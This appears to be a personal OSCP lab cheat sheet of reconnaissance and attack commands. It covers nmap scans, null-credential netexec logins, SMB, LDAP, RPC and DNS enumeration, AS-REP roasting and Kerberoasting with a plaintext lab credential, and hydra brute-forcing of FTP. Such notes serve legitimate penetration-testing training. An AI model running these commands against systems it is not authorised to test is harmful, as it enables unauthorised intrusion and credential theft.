OSCP Methodologie
Enumeration
IP=$ip
mkdir nmap
sudo nmap -sS $IP -sV -sC -Pn -n --open | tee -a nmap/nmap-default-script.md
sudo nmap -sS $IP -p- -T5 --min-rate 2000 -Pn -n --open | tee -a nmap/nmap-full-ports.md
rustscan -a $IP | tee -a nmap/rustscan
sudo autorecon $IP
# UDP
sudo nmap -Pn -n $IP -sU --top-ports=100netexec rdp $ip -u '' -p '' -x whoami
netexec wmi $ip -u '' -p '' -x whoami
netexec smb $ip -u '' -p '' -x whoami
netexec ldap $ip -u '' -p ''
netexec ftp $ip -u '' -p ''
netexec vnc $ip -u '' -p ''
netexec winrm $ip -u '' -p '' -x whoami
netexec ssh $ip -u '' -p '' -x whoami
netexec nfs $ip -u '' -p ''
netexec mssql $ip -u '' -p '' -x whoami
netexec smb $ip -u '' -p '' --shares# AS-REP Roasting
impacket-GetNPUsers -dc-ip $ip -request hutch.offsec/fmcsorley:'CrabSharkJellyfish192'
# Kerberoasting
impacket-GetUserSPNs -dc-ip $ip -request hutch.offsec/fmcsorley:'CrabSharkJellyfish192'SMB 139,445
# SMB Shares
smbclient -L ////$ip -U '' --password=''
smbmap -H $ip
# Enum4Linux
enum4linux-ng -R -d -A $ip
enum4linux -a $ipWEB
sudo gobuster dir -w '/usr/share/wordlists/common_big.txt' -u http://$IP -t 42 -b 404,403,400
# wordlist
/usr/share/wordlists/common_big_directory-list-2.3-medium.txt
- Subdomains ?DNS 53
# DNS Zone Transfert
dig axfr $domain @$ip
dig @$IP axfr hutch.offsecRPC
rpcclient -U "" -N $ip -c "srvinfo"
rpcclient -U "" -N $ip -c "enumdomusers"
rpcclient -U "" -N $ip -c "querydominfo"RDP 3389
# Occasionally we can see usernames
rdesktop $ipLDAP
ldapsearch -H ldap://$IP -x -s base namingcontexts
ldapsearch -H ldap://$IP -x -b"DC=hutch,DC=offsec"
ldapsearch -x -H ldap://$ip -D '' -w '' -b "DC=hutch,DC=offsec"
ldapsearch -H ldap://$ip -x -s base -b '' "(objectClass=*)" "*" +
nxc ldap $ip -u '' -p '' --query "(sAMAccountName=*)" "" FTP 21
- Default Creds
- upload/download files
wget -r ftp://Anonymous:pass@$IP
sudo hydra -L names.txt -P '/usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt' -s 21 ftp://$IPFlag
dir /s/b local.txt
dir /s/b proof.txtLast updated